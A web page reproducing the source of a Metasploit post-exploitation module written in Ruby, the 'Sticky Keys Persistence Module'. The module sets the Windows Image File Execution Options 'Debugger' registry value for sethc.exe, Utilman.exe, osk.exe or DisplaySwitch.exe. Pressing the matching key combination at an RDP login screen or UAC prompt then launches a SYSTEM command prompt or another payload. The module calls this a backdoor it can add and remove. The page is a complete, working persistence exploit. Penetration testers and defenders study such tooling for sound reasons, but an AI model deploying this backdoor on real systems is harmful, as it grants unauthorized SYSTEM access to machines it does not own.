CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/sticky_keys.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::Registry

9
  include Msf::Post::Windows::Priv

10


11
  DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'

12
  DEBUG_REG_VALUE = 'Debugger'

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Sticky Keys Persistence Module',

19
        'Description' => %q{

20
          This module makes it possible to apply the 'sticky keys' hack to a session with appropriate

21
          rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP

22
          login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting

23
          for certain executables.

24


25
          The module options allow for this hack to be applied to:

26


27
          SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),

28
          UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),

29
          OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and

30
          DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P).

31


32
          The hack can be added using the ADD action, and removed with the REMOVE action.

33


34
          Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded

35
          to the target prior to running the module. By default, a SYSTEM command prompt is installed

36
          using the registry method if this module is run without modifying any parameters.

37
        },

38
        'Author' => ['OJ Reeves'],

39
        'Platform' => ['win'],

40
        'SessionTypes' => ['meterpreter', 'shell'],

41
        'Actions' => [

42
          ['ADD', { 'Description' => 'Add the backdoor to the target.' }],

43
          ['REMOVE', { 'Description' => 'Remove the backdoor from the target.' }]

44
        ],

45
        'References' => [

46
          ['URL', 'https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit'],

47
          ['URL', 'https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html']

48
        ],

49
        'DefaultAction' => 'ADD'

50
      )

51
    )

52


53
    register_options([

54
      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),

55
      OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered.', '%SYSTEMROOT%\system32\cmd.exe'])

56
    ])

57
  end

58


59
  #

60
  # Returns the name of the executable to modify the debugger settings of.

61
  #

62
  def get_target_exe_name

63
    case datastore['TARGET']

64
    when 'UTILMAN'

65
      'Utilman.exe'

66
    when 'OSK'

67
      'osk.exe'

68
    when 'DISP'

69
      'DisplaySwitch.exe'

70
    else

71
      'sethc.exe'

72
    end

73
  end

74


75
  #

76
  # Returns the key combinations required to invoke the exploit once installed.

77
  #

78
  def get_target_key_combo

79
    case datastore['TARGET']

80
    when 'UTILMAN'

81
      'WINDOWS+U'

82
    when 'OSK'

83
      'WINDOWS+U, then launching the on-screen keyboard'

84
    when 'DISP'

85
      'WINDOWS+P'

86
    else

87
      'SHIFT 5 times'

88
    end

89
  end

90


91
  #

92
  # Returns the full path to the target's registry key based on the current target

93
  # settings.

94
  #

95
  def get_target_exe_reg_key

96
    "#{DEBUG_REG_PATH}\\#{get_target_exe_name}"

97
  end

98


99
  #

100
  # Runs the exploit.

101
  #

102
  def run

103
    unless is_admin?

104
      fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')

105
    end

106


107
    print_good('Session has administrative rights, proceeding.')

108


109
    target_key = get_target_exe_reg_key

110


111
    if action.name == 'ADD'

112
      command = expand_path(datastore['EXE'])

113


114
      registry_createkey(target_key)

115
      registry_setvaldata(target_key, DEBUG_REG_VALUE, command, 'REG_SZ')

116


117
      print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")

118
    else

119
      registry_deletekey(target_key)

120
      print_good("'Sticky keys' removed from registry key #{target_key}.")

121
    end

122
  end

123
end

124


125